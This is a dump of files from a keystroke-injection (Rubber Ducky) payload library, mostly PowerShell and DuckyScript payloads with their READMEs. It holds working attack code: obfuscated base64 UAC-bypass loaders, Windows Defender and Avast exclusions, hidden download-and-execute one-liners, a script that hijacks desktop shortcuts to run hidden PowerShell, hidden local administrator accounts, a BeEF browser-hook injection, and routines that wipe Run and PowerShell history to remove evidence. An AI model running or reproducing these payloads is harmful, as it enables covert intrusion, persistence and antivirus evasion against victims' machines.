detected\n\tThen plays the sound with nothing popping up catching your victim off guard\n\tFinally a few lines of script are executed to empty TMP folder, clear Run and Powershell history\n\n#>\n\n############################################################################################################################################################\n\n# Download Sound (When using your own link \"dl=0\" needs to be changed to \"dl=1\")\niwr https:// ?dl=1 -O $env:TMP\\e.wav\n\n############################################################################################################################################################\n\n# This turns the volume up to max level\n$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}\n\n############################################################################################################################################################\n\n# This while loop will constantly check if the mouse has been moved \n# if the mouse has not moved \"SCROLLLOCK\" will be pressed to prevent screen from turning off\n# it will then sleep for the indicated number of seconds and check again\n\nAdd-Type -AssemblyName System.Windows.Forms\n$originalPOS = [System.Windows.Forms.Cursor]::Position.X\n\n while (1) {\n $pauseTime = 3\n if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){\n break\n }\n else {\n $o.SendKeys(\"{CAPSLOCK}\");Start-Sleep -Seconds $pauseTime\n }\n }\n############################################################################################################################################################\n\n# Play Sound \n$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation=\"$env:TMP\\e.wav\";$PlayWav.playsync()\n\n############################################################################################################################################################\n\n<#\n\n.NOTES \n\tThis is to clean up behind you and remove any evidence to prove you were there\n#>\n\n# Delete contents of Temp folder \n\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# Delete run box history\n\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\n\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Deletes contents of recycle bin\n\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\n" }, { "path": "payloads/library/execution/-RD-Play-WAV/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Play-WAV\n\nA script used to download a WAV file and play it after a mouse movement is detected\n\n## Description\n\nThis program starts off by using an Invoke-WebRequest to download a WAV file\nThe system volume is then turned up to the max level\nThen the script will be paused until a mouse movement is detected \nAfter one is the WAV file will be played\n\n## Getting Started\n\n### Dependencies\n\n* DropBox - Your Shared link for the intended file\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download your WAV file\n```\npowershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\\e.wav\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

I am Jakoby

\n


\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-Play-WAV)\n

\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n\n

(back to top)

\n" }, { "path": "payloads/library/execution/-RD-Play-WAV/payload.txt", "content": "REM Title: Play-WAV\n\nREM Author: I am Jakoby\n\nREM Description: This payload is meant to play a WAV file hidden. See Play-WAV.ps1 for more details\n\nREM Target: Windows 10, 11\n\nREM Remeber to replace the link with your link for the intended file to download\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl\nDELAY 500\nENTER\n" }, { "path": "payloads/library/execution/-RD-SafeHaven/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Safe Haven\n\nA script used to open an elevated powershell console and created a folder ignored by the AntiVirus\n\n## Description\n\nThis is a UAC bypass payload that will open an elevated powershell console \n\nNext a Directory called \"safe\" will be generated in your Documents Directory\n\nThe \"safe\" directory will be added to the Window's Defender Exclusion list\n\nThe AntiVirus will ignore all files downloaded to or ran from here\n\n## Getting Started\n\n### Dependencies\n\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* A keystroke injection based payload will run\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

I am Jakoby

\n


\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n Project Link: (https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-SafeHaven)\n

\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "payloads/library/execution/-RD-SafeHaven/SafeHaven.txt", "content": "REM Title: Safe-Haven\r\n\r\nREM Author: I am Jakoby\r\n\r\nREM Description: This is a UAC bypass payload that will open an elevated powershell console \r\nREM Next a Directory called \"safe\" will be generated in your Documents Directory\r\nREM The \"safe\" directory will be added to the Window's Defender Exclusion list\r\nREM The AntiVirus will ignore all files downloaded to or ran from here\r\n\r\nREM Target: Windows 10, 11\r\n\r\nDELAY 500\r\nGUI r\r\nDELAY 500\r\nSTRING powershell \r\nENTER\r\n\r\nDELAY 1000\r\n\r\nSTRING & ( $PShoME[21]+$psHOME[30]+'x')(NEw-objECt IO.COMpresSiON.DeflATESTrEAm([sYStEm.io.MeMOrySTreAm] [SYSTEM.CONVERT]::fROMBase64StRing('hZFPT8JAEMW/yqbxWiDqwYRweFvKtipiLRAhvdTusBj6L93qop/eXRKNXvCyyWTe+72Z2YvFXEy8tjHU6T2V5YCOxHzD9sx/aB7dU8fMD49UMP7R5lozn+qC3YIbiBASvMF0hFjhgHCFF8UvMW2wTvjS1SvFE8xiLA0XCA9Ygs8wM3gCf4eYQya8hzj5RojmeAb/dNyt4iWCGAvj+hpb8BZRjBg2JwI2idUL5focIrF99AhHKGDzrG6b8MpxC8cR19gYxwPuE5sfKVdrRLZvLFfcuPzkZx+r+7MfJhNv3JFiuZTMi+6CVZY2u97kHWVBaW9COhs0lcpSd8Fs0VKdFU1V5bX02FCyC3tjNtz9h6i0r6nvX2uls+CtW1N3cnsO7Tn/rpE2oKXOfdI47fOu99OSqGW+ZlcnvKSSejo7pPc9ynnt72lOli8=' ),[SYsTEM.io.cOmpressION.coMPRESsiOnmode]::DEcOMPRESS )| FoREACh-object{NEw-objECt SySTeM.Io.StreaMreadER( $_ ,[System.teXT.EnCoDINg]::ASCiI) }|foReaCh-objEct {$_.ReAdToEND()} )\r\nENTER\r\n\r\n\r\n\r\n\r\n" }, { "path": "payloads/library/execution/-RD-ShortcutJacker/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n \n\n

\n \n \n \n

\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# Shortcut Jacker\n\n

\n \n \"Python\"\n \n
YouTube Tutorial\t\n

\n\nA script used to embed malware in the shortcut on your targets desktop\n\n## Description\n\nThis payload will run a powershell script in the background of any shortcut used on the targets desktop\n\nThis is done by taking advantage of the ```Target``` field where powershell commands can be stored or run. \n\nThis field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the ```$code``` variable and it will still run. \n\nSo if your command exceeds that consider using an IWR function to download and execute a longer script. \n\nI have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13)\n\n\n\nInside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored.\n\n---------------------------------------------------------------------------------------------------------------------------------------------------------\n\n\n\n---------------------------------------------------------------------------------------------------------------------------------------------------------\n\nUsing the ```Get-Shortcut``` function we will get the following information we can then use to maintain the integrity of the appearance of the shortcut after manipulating the ```Target``` field.\n\n\n\n## Getting Started\n\nOnce the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file\n\n### Dependencies\n\n* An internet connection\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload\n```\npowershell -w h -NoP -NonI -Exec Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; invoke-expression $pl\n```\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

📱 My Socials 📱

\n
\n\n \n \n \n \n \n \n
\n \n \"C#\"\n \n
YouTube\n 		\n \n \"Python\"\n \n
Twitter\n 		\n \n \"Golang\"\n \n
Instagram\n 		\n \n \"Jsonnet\"\n \n
Discord\n
\n
\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n\n

\n \"Github\n

\n" }, { "path": "payloads/library/execution/-RD-ShortcutJacker/Shortcut-Jacker-Execute.txt", "content": "REM Title: Shortcut-Jacker\n\nREM Author: I am Jakoby\n\nREM Description: This payload will run a powershell script in the background of any shortcut used on the targets desktop\n\nREM Target: Windows 10, 11\n\nGUI r\nDELAY 500\nSTRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr ?dl=1; invoke-expression $pl\nENTER\n\nREM Remember to replace the link with your DropBox shared link for the intended file to download\nREM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly\n" }, { "path": "payloads/library/execution/-RD-ShortcutJacker/Shortcut-Jacker.ps1", "content": "############################################################################################################################################################ \n# | ___ _ _ _ # ,d88b.d88b # \n# Title : Shortcut-Jacker | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\n# Category : Execution | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\n# Target : Windows 10,11 | |___/ # /\\/|_ __/\\\\ # \n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \n# | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\n# # / \\ / ~ \\ #\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\n############################################################################################################################################################\n \n<#\n.SYNOPSIS\n\tThis is payload used to inject powershell code into shortcuts\n\n.DESCRIPTION \n\tThis payload will gather information on the shortcuts on your targets desktop \n \tThat data will then be manipulated to embed a powershell script \n \tThis script will be ran in the background when the short cut is \n\n#>\n\n############################################################################################################################################################\n\n<#\n.NOTES\n\tThe powershell code stored in this variable is what will run in the background\n\tThis field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code \n\tvariable and it will still run.\n#> \n\n$code = \"Add-Type -AssemblyName PresentationCore,PresentationFramework; [System.Windows.MessageBox]::Show('Hacked')\"\n\n############################################################################################################################################################\n\nfunction Get-Shortcut {\n param(\n $path = $null\n )\n\n $obj = New-Object -ComObject WScript.Shell\n\n if ($path -eq $null) {\n $pathUser = [System.Environment]::GetFolderPath('StartMenu')\n $pathCommon = $obj.SpecialFolders.Item('AllUsersStartMenu')\n $path = dir $pathUser, $pathCommon -Filter *.lnk -Recurse \n }\n if ($path -is [string]) {\n $path = dir $path -Filter *.lnk\n }\n $path | ForEach-Object { \n if ($_ -is [string]) {\n $_ = dir $_ -Filter *.lnk\n }\n if ($_) {\n $link = $obj.CreateShortcut($_.FullName)\n\n $info = @{}\n $info.Hotkey = $link.Hotkey\n $info.TargetPath = $link.TargetPath\n $info.LinkPath = $link.FullName\n $info.Arguments = $link.Arguments\n $info.Target = try {Split-Path $info.TargetPath -Leaf } catch { 'n/a'}\n $info.Link = try { Split-Path $info.LinkPath -Leaf } catch { 'n/a'}\n $info.WindowStyle = $link.WindowStyle\n $info.IconLocation = $link.IconLocation\n\n return $info\n }\n }\n}\n\n#-----------------------------------------------------------------------------------------------------------\n\nfunction Set-Shortcut {\n param(\n [Parameter(ValueFromPipelineByPropertyName=$true)]\n $LinkPath,\n $IconLocation,\n $Arguments,\n $TargetPath\n )\n begin {\n $shell = New-Object -ComObject WScript.Shell\n }\n\n process {\n $link = $shell.CreateShortcut($LinkPath)\n\n $PSCmdlet.MyInvocation.BoundParameters.GetEnumerator() |\n Where-Object { $_.key -ne 'LinkPath' } |\n ForEach-Object { $link.$($_.key) = $_.value }\n $link.Save()\n }\n}\n\n#-----------------------------------------------------------------------------------------------------------\n\nfunction hijack{\n$Link = $i.LinkPath\n$Loc = $i.IconLocation\n$TargetPath = $i.TargetPath\nif($Loc.length -lt 4){$Loc = \"$TargetPath$Loc\"}\n$Target = $i.Target\nif(Test-Path -Path \"$Link\" -PathType Leaf){Set-Shortcut -LinkPath \"$Link\" -IconLocation \"$Loc\" -Arguments \"-w h -NoP -NonI -Exec Bypass start-process '$TargetPath';$code\" -TargetPath \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"}\n}\n\n#-----------------------------------------------------------------------------------------------------------\n\nGet-ChildItem –Path \"$Env:USERPROFILE\\Desktop\" -Filter *.lnk |Foreach-Object {$i = Get-Shortcut $_.FullName;hijack $_.FullName}\n" }, { "path": "payloads/library/execution/-RD-UrAttaControl/README.md", "content": "![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)\n\n\n
\n Table of Contents\n
    \n
  1. Description
    2. \n
  2. Getting Started
    3. \n
  3. Contributing
    4. \n
  4. Version History
    5. \n
  5. Contact
    6. \n
  6. Acknowledgments
    7. \n
\n
\n\n# UrAttaControl\n\nA script used to open an elevated powershell console and execute admin level commands\n\n## Description\n\nCompletely ran from the execute file. Replace the URL in that file with yours leading to a base64 script\n\nThis script will use IEX to download a base64 script to the $Payload variable\n\nUsing a keystroke injections attack a heavily obfuscated and encoded snippet will download and execute any base64 \n\nscript saved in the $Payload variable\n\nThis payload completely bypasses the UAC and will run any admin level script without a prompt\n\nYou can use this function I wrote to convert your .ps1 sscripts to Base64\n\nhttps://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n

(back to top)

\n\n### Executing program\n\n* Plug in your device\n* A keystroke injection based payload will run\n\n

(back to top)

\n\n## Contributing\n\nAll contributors names will be listed here\n\nI am Jakoby\n\n

(back to top)

\n\n## Version History\n\n* 0.1\n * Initial Release\n\n

(back to top)

\n\n\n## Contact\n\n

I am Jakoby

\n


\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/RubberDucky/Payloads/RD-UrAttaControl)\n

\n\n\n\n

(back to top)

\n\n\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [MG](https://github.com/OMG-MG)\n\n

(back to top)

\n" }, { "path": "payloads/library/execution/-RD-UrAttaControl/UrAttaControl-Execute.txt", "content": "REM Title: UrAttaControl\n\nREM Author: I am Jakoby\n\nREM Description: This is a UAC bypass payload that will open an elevated powershell console and run any script.\nREM Reaplce the URL down below with a link to a base64 encoded payload you have. See README.md for more details\n\nREM Target: Windows 10, 11\n\nREM\t NOTES: Additionally instead of pulling down your script with IWR you can hardcode the Base64 script to the $Payload variable\nREM EXAMPLE: $Payload = \"cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=\"\t\t- This Base64 script will open notepad\n\nREM You can use this function I wrote to convert your .ps1 sscripts to Base64\nREM https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md\t\n\nGUI r\nDELAY 500\nSTRING powershell \nENTER\n\nDELAY 1000\n\nSTRING $url = \"YOUR-URL-WITH-BASE64-ENCODED-SCRIPT\"\nSHIFT ENTER\nSTRING $Payload = (Invoke-WebRequest $url'?dl=1').Content\nSHIFT ENTER\nSTRING ( nEw-obJECt Io.cOMprEssion.dEfLAtEStreAM([iO.MEMoRysTream][coNVerT]::FrOMBasE64sTring( 'hY69CsIwFEZf5RK6ph0ci1MHBZEKQacsoflahfyRRKpvb1MQnOp2h3vOd6r+fNiz4GfEdIcxNV4gDjdQdVFv45Um1kZMpPRyHU/dVQo/5llFyM6olJBk7e0kRaFlH+Dk4K1VTjNqNFWLn5rxn8ImnpDzw01Jds94Q1xpVtSs8KPXy0BALIGtyCpmLgwQiCfarXoNg4zNSPZN2f79rVmRDw=='), [SySTEM.Io.cOmprEsSION.comprEsSiOnmOdE]::DECoMPress )| ForeAch{ nEw-obJECt IO.stReaMReAdEr( $_, [SYSTEm.TEXT.encODINg]::aSciI ) } |ForEaCh { $_.rEAdtoENd() } )|& ( $VeRBosEPreFEreNcE.tosTRING()[1,3]+'x'-joIN'')\nSHIFT ENTER\nSTRING exit\nENTER\n" }, { "path": "payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/README.md", "content": "# Add An Excepiton To Avast Antivirus\n\nThis script can be used to put an arbitrary exception path in the Avast app.\n\n**Category**: Execution\n\n## Description\n\nThis script can be used to put an arbitrary exception path in the Avast app.\n\nThe script open the Avast app, then go to menu, then go to, avast settings, then go to exception menu, then click the add exception button, then write the full-path defined before and save it, then close the app.\n\nChoosing a specific file, folder, or website will exclude it from all Avast shields and scans, so be very careful when using this payload because it can concretely cause damage to your machine.\n\n- You must edit the FULL-PATH with the path that you want to set as exception in the payload.txt file\n\n```DuckyScript\nREM Set the full-path that you want to set as exception\nDEFINE FULL-PATH example/to/path\n```\n\n### Dependencies\n\n* The target must have **Avast installed** and **configured** on the machine\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt", "content": "REM ########################################################\nREM # |\nREM # Title : Add An Exception To Avast Antivirus |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Execution |\nREM # Target : Windows 10/11 |\nREM # |\nREM ########################################################\n\n\nREM Requirements:\nREM - Avast installed and configured\n\n\nREM Set the full-path that you want to set as exception\nDEFINE FULL-PATH example/to/path\n\n\nREM Open Avast application\nDELAY 2000\nGUI\nDELAY 1000\nSTRING avast\nDELAY 1000\nENTER\n\nREM Go to Avast menu\nDELAY 1000\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nENTER\n\nREM Go to Avast settings\nDELAY 1000\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nENTER\n\nREM Go to Exceptions menu\nDELAY 1000\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nTAB\nDELAY 500\nENTER\n\nREM Add Exception button\nDELAY 500\nTAB\nDELAY 500\nENTER\n\nREM Write the full-path and then close the Avast app\nDELAY 1000\nTAB\nDELAY 500\nSTRING FULL-PATH\nDELAY 500\nTAB\nDELAY 500\nENTER\nDELAY 1000\nALT F4\n" }, { "path": "payloads/library/execution/Add_Local_Admin/payload.txt", "content": "REM Title: Add_Local_Admin\nREM Author: LulzAnarchyAnon\nREM Description: Administrator PowerShell is opened, and resized for a more stealthy payload delivery, then the payload\nREM creates a local admin account on the target system, afterwards powershell exits, and all history is cleared. \nREM This lightning fast payload deployed, and was completed in a test run in 10.57 seconds\nREM Target: Windows 10 and 11 \nREM Props: Darren Kitchen, and I am Jakoby\nREM Version: 3.0\nREM Category: Execution\n\n\nDELAY 200\nGUI r\nDELAY 200\nSTRINGLN powershell -Command \"Start-Process PowerShell -Verb RunAs\" \nDELAY 500\nALT y\nDELAY 500\nSTRINGLN\n PowerShell.exe -noe -c \". mode.com con: lines=5 cols=12\"\n $Username = \"Admin2\"\n $Password = \"password\"\n $group = \"Administrators\"\n $adsi = [ADSI]\"WinNT://$env:COMPUTERNAME\"\n $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }\n if ($existing -eq $null) {\n Write-Host \"Creating new local user $Username.\"\n & NET USER $Username $Password /add /y /expires:never\n Write-Host \"Adding local user $Username to $group.\"\n & NET LOCALGROUP $group $Username /add\n }\n {\n Write-Host \"Setting password for existing local user $Username.\"\n $existing.SetPassword($Password)\n }\n Write-Host \"Ensuring password for $Username never expires.\"\n & WMIC USERACCOUNT WHERE \"Name='$Username'\" SET PasswordExpires=FALSE\n rm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n reg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n exit\n exit\nEND_STRINGLN\n" }, { "path": "payloads/library/execution/Admin_Who_Never_Sleeps/ReadMe.md", "content": "**Admin who never sleeps** (for Windows)\n\nQuick and simple script that adds a local hidden admin user then sets power settings to never sleep.\n\n**User**: WinSystem\n
\n**Pass**: Some-P@ssw0rd\n\nYou're able to easily replace the above info, but make sure it's done everywhere! The name is used to hide it from view.\n\n_NOTE: Local admin required first!_\n" }, { "path": "payloads/library/execution/Admin_Who_Never_Sleeps/payload.txt", "content": "REM Title: Admin who never sleeps\nREM Desc: Adds a local hidden admin user and sets power settings to never sleep.\nREM Author: UberGuidoZ\nREM Target: Windows (local admin required)\n\nREM Launch admin-level CMD prompt\nDELAY 3000\nGUI r\nDELAY 1000\nSTRING cmd\nDELAY 500\nCTRL-SHIFT ENTER\nDELAY 1000\nLEFTARROW\nDELAY 250\nENTER\nDELAY 1500\n\nREM Create local admin user WinSystem with pass Some-P@ssw0rd\nSTRING net user WinSystem Some-P@ssw0rd /add /fullname:\"Windows System\" /passwordchg:no && net localgroup administrators WinSystem /add\nENTER\nDELAY 1500\n\nREM Set WinSystem user pass to never expire, skip UAC, and hide the user\nSTRING wmic useraccount where name='WinSystem' set passwordexpires=false && REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 && REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /f /v WinSystem /t REG_DWORD /d 0\nENTER\nDELAY 1500\n\nREM Change power settings to avoid loss of access later (Hibernation, Standby, Disk Timeout)\n\nSTRING powercfg -h off && powercfg /x -hibernate-timeout-ac 0 && powercfg /x -hibernate-timeout-dc 0\nENTER\nDELAY 1000\nSTRING Powercfg /x -standby-timeout-ac 0 && powercfg /x -standby-timeout-dc 0\nENTER\nDELAY 1000\nSTRING powercfg /x -disk-timeout-ac 0 && powercfg /x -disk-timeout-dc 0\nENTER\nDELAY 1000\n\nREM Set monitor timeouts to avoid noticing system is awake\nSTRING powercfg /x -monitor-timeout-ac 10 && powercfg /x -monitor-timeout-dc 10\nENTER\nDELAY 1000\n\nREM Exit and enjoy your user whenever!\nEXIT\n" }, { "path": "payloads/library/execution/BeEF_Injection/payload.txt", "content": "REM TITLE BeEF Injection\nREM AUTHOR\nREM __ __ .__ \nREM / \\ / \\|__| ____ ____ \nREM \\ \\/\\/ /| | / \\ / _ \\ \nREM \\ / | || | \\( <_> ) \nREM \\__/\\ / |__||___| / \\____/ \nREM \\/ \\/ \nREM \nREM __ __ .__ .__ .__ \nREM / \\ / \\|__|| | | | ___.__. \nREM \\ \\/\\/ /| || | | | < | | \nREM \\ / | || |__| |__\\___ | \nREM \\__/\\ / |__||____/|____// ____| \nREM \\/ \\/ \nREM\nREM DESCRIPTION This will open a ton of tabs on the target device.\nREM One of which will be a domain/ip you are hosting. This script is\nREM meant to be used with the beEF framework. All you need to do is \nREM replace the specified link (Line 62) with your hosted one. The \nREM idea is to \"hide\" the browser tab in the background behind all\nREM the other tabs. Written in DuckyScript 1.0 \nREM TARGET Android Devices with Chrome as the default browser.\n\nDELAY 1000\nGUI ENTER\nDELAY 500\nGUI b\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN www.youtube.com\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN www.facebook.com\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN https://www.nytimes.com/\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nREM Enter your domain/ip site below.\nDELAY 1000\nSTRINGLN \nDELAY 2000\nCTRL d\nDELAY 500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN instagram.com\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN twitter.com\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN whatsapp.com\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN pinterest.com\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN microsoft.com\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN imdb.com\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN netflix.com\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN apple.com\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN globo.com\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN translate.google.com\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN it.wikipedia.org\nDELAY 1500\nCTRL t\nDELAY 500\nCTRL l\nDELAY 500\nCTRL l\n\nDELAY 1000\nSTRINGLN openai.com\nDELAY 1500\nCTRL t\nDELAY 500\n\nGUI ENTER\n" }, { "path": "payloads/library/execution/Call_Someone_On_An_iPhone/README.md", "content": "# Call Someone On An iPhone\n\nThis script can be used to call someone really fast using an iPhone, so iOS system.\n\n**Category**: Execution\n\n## Description\n\nThis script can be used to call someone really fast using an iPhone, so iOS system.\n\nOpen search bar, then open the Phone app (I used the italian name so 'Telefono'), then delete what is (hidden) stored and write the number, then call it.\n\n## Dependencies\n\n* The phone must be unlocked\n\n## Test\n\n- iPhone 14\n- iOS 16.4.1\n\n## Settings\n\n- You need to change the name of the application according to the language you have on your phone.\n\n ```DuckyScript\n [20] DEFINE #PHONE-APP-NAME\n ```\n\n- You must set the phone number to be called\n\n```DuckyScript\n [22] DEFINE #NUMBER example\n```\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
